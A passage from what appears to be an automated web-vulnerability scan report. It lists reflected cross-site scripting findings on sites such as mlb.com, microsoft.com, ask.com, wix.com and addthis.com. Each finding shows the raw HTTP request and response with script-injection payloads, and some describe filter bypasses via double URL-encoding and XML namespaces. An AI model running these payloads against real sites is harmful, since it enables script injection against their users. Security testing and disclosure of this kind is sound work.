&bgColorOverlay=000000&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=35&bgColorShadow=55BBDD&bgTextureShadow=01_flat.png&bgImgOpacityShadow=100&opacityShadow=100&thicknessShadow=2px9a5b8"><script>alert(1)</script>939b7359cb6&offsetTopShadow=-2px&offsetLeftShadow=-2px&cornerRadiusShadow=7px*//*" type="text/css" media="all" />
...[SNIP]...

2.83. http://mlb.mlb.com/index.jsp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://mlb.mlb.com
Path:   /index.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c3b08"><script>alert(1)</script>b44d30a1246 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.jsp?c3b08"><script>alert(1)</script>b44d30a1246=1 HTTP/1.1
Host: mlb.mlb.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/html; charset=utf-8
Cache-Control: max-age=600
Expires: Sat, 20 Nov 2010 18:06:26 GMT
Date: Sat, 20 Nov 2010 17:56:26 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131968


                                       <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http:/
...[SNIP]...
<meta property="og:url" content="http://mlb.mlb.com/index.jsp?c3b08"><script>alert(1)</script>b44d30a1246=1&tcid=fb_share" />
...[SNIP]...

2.84. http://onlinehelp.microsoft.com/en-US/bing/ff808535.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://onlinehelp.microsoft.com
Path:   /en-US/bing/ff808535.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a64c2"><script>alert(1)</script>740e1573786 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en-US/bing/ff808535.aspx?a64c2"><script>alert(1)</script>740e1573786=1 HTTP/1.1
Host: onlinehelp.microsoft.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: A=I&I=AxUFAAAAAABNBgAAM19VJr1F78JLHJiR+JO+Sw!!&M=1; domain=.microsoft.com; expires=Tue, 20-Nov-2040 17:56:36 GMT; path=/
Set-Cookie: ADS=SN=175A21EF; domain=.microsoft.com; path=/
Set-Cookie: ixpLightBrowser=0; domain=.microsoft.com; expires=Tue, 20-Nov-2040 17:56:36 GMT; path=/
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
X-Powered-By: ASP.NET
Date: Sat, 20 Nov 2010 17:56:35 GMT
Content-Length: 43681


<?xml version="1.0" encoding="UTF-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN" "http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head id=
...[SNIP]...
<a href="mailto:?subject=Bing%20Help&body=http://onlinehelp.microsoft.com/en-us/bing/ff808535.aspx?a64c2"><script>alert(1)</script>740e1573786=1" id="ctl00_ContentTitle_TopicTools_EmailLink" target="_blank">
...[SNIP]...

2.85. http://siteanalytics.compete.com/DOMAIN/ [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://siteanalytics.compete.com
Path:   /DOMAIN/

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload bff31<a%20b%3dc>ace790abb9 was submitted in the REST URL parameter 1. This input was echoed as bff31<a b=c>ace790abb9 in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags and attributes into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /DOMAINbff31<a%20b%3dc>ace790abb9/ HTTP/1.1
Host: siteanalytics.compete.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:52:54 GMT
Server: Apache
Vary: Cookie
Content-Length: 20140
Connection: close
Content-Type: text/html; charset=utf-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
...[SNIP]...
<h1>
domainbff31<a b=c>ace790abb9
</h1>
...[SNIP]...

2.86. http://ss.ask.com/query [fn parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ss.ask.com
Path:   /query

Issue detail

The value of the fn request parameter is copied into the HTML document as plain text between tags. The payload f9815<script>alert(1)</script>172a4ed3072 was submitted in the fn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestionf9815<script>alert(1)</script>172a4ed3072&q=los+angele&limit=8&timestamp=1290271578074 HTTP/1.1
Accept: */*
Referer: http://www.ask.com/?o=0&l=dir
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ss.ask.com
Proxy-Connection: Keep-Alive
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmb=252994457.1.10.1290271572; __utmc=252994457; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_scnt=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:53:44 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 709
Content-Type: text/javascript

searchSuggestionf9815<script>alert(1)</script>172a4ed3072(["los angele",
["<span class=\\\"suggest\\\">los angele</span>s short film festival","<span class=\\\"suggest\\\">los angele</span>s","<span
...[SNIP]...

2.87. http://ss.ask.com/query [q parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://ss.ask.com
Path:   /query

Issue detail

The value of the q request parameter is copied into the HTML document as plain text between tags. The payload f1910<script>alert(1)</script>016f7840526 was submitted in the q parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /query?sstype=prefix&fn=searchSuggestion&q=los+angelef1910<script>alert(1)</script>016f7840526&limit=8&timestamp=1290271578074 HTTP/1.1
Accept: */*
Referer: http://www.ask.com/?o=0&l=dir
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Host: ss.ask.com
Proxy-Connection: Keep-Alive
Cookie: cu.wz=0; tbe=1; accepting=1; user=o=0&l=dir; puser=pt=U2F0LTIwLU5vdi0yMDEwLTE2OjQ3OjI4LVVUQw%3D%3D&po=0&pp=dir; skftc=ftc_ret=0&ftc_ac4=0&ftc_ord=0&ftc_ac2=0&ftc_ac3=0&ftc_ac1=0&ftc_scr=0&ftc_pst=0; qc=0; __utma=252994457.227355931.1290271572.1290271572.1290271572.1; __utmb=252994457.1.10.1290271572; __utmc=252994457; __utmz=252994457.1290271572.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); wz_uid=0C41C9EC70F2B3A933ADE477A41477DA; wz_sid=0346C8EF73F2B3A933ADE477A41477DA; wz_scnt=1

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:53:46 GMT
Server: Apache/2.2.13 (Unix)
Content-Length: 79
Content-Type: text/javascript

searchSuggestion(["los angelef1910<script>alert(1)</script>016f7840526",
[]]);

2.88. http://static.wix.com/client/getComponentsTypeList.php [componentTypeViewerList parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://static.wix.com
Path:   /client/getComponentsTypeList.php

Issue detail

The value of the componentTypeViewerList request parameter is copied into the XML document as plain text between tags. The payload 18780%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb4ced27665b was submitted in the componentTypeViewerList parameter. This input was echoed as 18780<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b4ced27665b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the componentTypeViewerList request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /client/getComponentsTypeList.php?componentTypeViewerList=5minMediaControl,CtrlSimple,FiveGridLine,MediaControlPlaylist,StackerCarousel,StackerGallery,StackerSlider,TextButton3G,TextButtonSkinnable,YoutubeMediaControl,alphaOnRoll,animatingButton,area,areaScrollPane,areaScrollText,arrangerMenu,basicShape,contactForm,expand,flashAdjustColor,flashBlend,flashTint,generalExternal,glowOnRoll,gotoRight,gotoSecureURL,gotoState,gotoStateOnRoll,gotoURL,groupHolder,loginView,matrixArranger,media,paraText,photoAlbomScroll,photoFrame,photoStackerGallery,picture,soundOnRoll,textButtonMenu,textButtonMenuHorz,textButtonMenuVert,titleText,viewStack,wizard18780%253ca%2520xmlns%253aa%253d%2527http%253a%252f%252fwww%252ew3%252eorg%252f1999%252fxhtml%2527%253e%253ca%253abody%2520onload%253d%2527alert%25281%2529%2527%252f%253e%253c%252fa%253eb4ced27665b&cacheKiller=U021 HTTP/1.1
Accept: */*
Accept-Language: en-US
Referer: http://static.wix.com/client/app.swf?v=95
x-flash-version: 10,1,102,64
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: static.wix.com
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
X-Powered-By: PHP/5.2.6-1+lenny9
Last-Modified: Mon, 15 Nov 2010 08:23:15 GMT
Etag: 785b80e09d49a8c8f04cc2864095135e
Content-Type: text/xml
Date: Sat, 20 Nov 2010 16:52:51 GMT
Server: sputnik4
Accept-Ranges: bytes
Cache-Control: private, max-age=10800
Age: 0
Expires: Sat, 20 Nov 2010 19:52:51 GMT
x-cdn: Served by Cotendo
Connection: Keep-Alive
Content-Length: 45234

<?xml version="1.0" encoding="UTF-8" ?>
<component-type-list-result success="true" errorCode="0" errorDescription="OK">
<!-- filename = 5minMediaControl -->
<component-type component_type="5minMedi
...[SNIP]...
<!-- filename = wizard18780<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>b4ced27665b -->
...[SNIP]...

2.89. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8f34c<script>alert(1)</script>318892cabab was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php8f34c<script>alert(1)</script>318892cabab HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=p81rjp77olcodosmm631qfhim3; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1473
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php8f34c<script>alert(1)</script>318892cabab</strong>
...[SNIP]...

2.90. http://www.addthis.com/bookmark.php [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6eb9a"-alert(1)-"112f98354b8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php6eb9a"-alert(1)-"112f98354b8 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 16:56:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Set-Cookie: PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 1447
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php6eb9a"-alert(1)-"112f98354b8";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.91. http://www.addthis.com/bookmark.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6c07c"-alert(1)-"345ff452a56 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php/6c07c"-alert(1)-"345ff452a56 HTTP/1.1
Host: www.addthis.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 20 Nov 2010 16:56:08 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 88293

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>AddThis Social Bookm
...[SNIP]...
<script type="text/javascript">
var u = "/bookmark.php/6c07c"-alert(1)-"345ff452a56";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.92. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload c82d9<script>alert(1)</script>fdcbc7a51dd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMTc82d9<script>alert(1)</script>fdcbc7a51dd HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:10:22 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1619

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMTc82d9<script>alert(1)</script>fdcbc7a51dd</strong>
...[SNIP]...

2.93. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 3af4b"-alert(1)-"778de5bfb4b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT3af4b"-alert(1)-"778de5bfb4b HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:10:15 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1593

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<script type="text/javascript">
var u = "/404/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT3af4b"-alert(1)-"778de5bfb4b";
if (typeof utmx != "undefined" && utmx('combination') != undefined) {
u += (u.indexOf("?") == -1 ? '?' : '&') + 'com=' + utmx('combination');
}
if (window._gat) {
var gaPageTracker = _gat._get
...[SNIP]...

2.94. http://www.addthis.com/bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 52985<script>alert(1)</script>c2109c4da0c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT?52985<script>alert(1)</script>c2109c4da0c=1 HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Accept-Encoding: gzip, deflate
Proxy-Connection: Keep-Alive
Host: www.addthis.com
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:09:59 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1581

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>bookmark.php6eb9a%22-alert(1)-%22HOYT.LLC.XSS.PoC.11.20.2010.WWW.ADDTHIS.COM.1655.GMT?52985<script>alert(1)</script>c2109c4da0c=1</strong>
...[SNIP]...

2.95. http://www.addthis.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8cfd7<script>alert(1)</script>e725d8a4db7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /favicon.ico8cfd7<script>alert(1)</script>e725d8a4db7 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.addthis.com
Proxy-Connection: Keep-Alive
Cookie: uid=4cd70ff39ffa55be; psc=0; di=%7B%7D..1290096886.10R|1290201756.60|1289335234.66; loc=US%2CNzUyMDFOQVVTVFgyMTI4MDgzMjYyMzAwMDAwVg%3d%3d; dt=X; PHPSESSID=15fm6nh0l1cvvqskakcu5rumi5; Coyote-2-a0f0083=a0f021f:0; __utma=56306477.1852192147.1290272194.1290272194.1290272194.1; __utmb=56306477.1.10.1290272194; __utmc=56306477; __utmz=56306477.1290272194.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.0 404 Not Found
Date: Sat, 20 Nov 2010 17:11:05 GMT
Server: Apache
X-Powered-By: PHP/5.2.13
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Set-Cookie: Coyote-2-a0f0083=a0f021f:0; path=/
Content-Length: 1471

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Not found</title>
<l
...[SNIP]...
<strong>favicon.ico8cfd7<script>alert(1)</script>e725d8a4db7</strong>
...[SNIP]...

2.96. http://www.addthis.com/favicon.ico [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.addthis.com
Path:   /favicon.ico

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 278d6"-alert(1)-"ce0f54c8f21 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /favicon.ico278d6"-alert(1)-"ce0f54c8f21 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET4.0C; .NET4.0E; .NET CLR 3.5.30729; .NET CLR 3.0.30729)
Host: www.addthis.com
Proxy-Connection: Keep-Alive
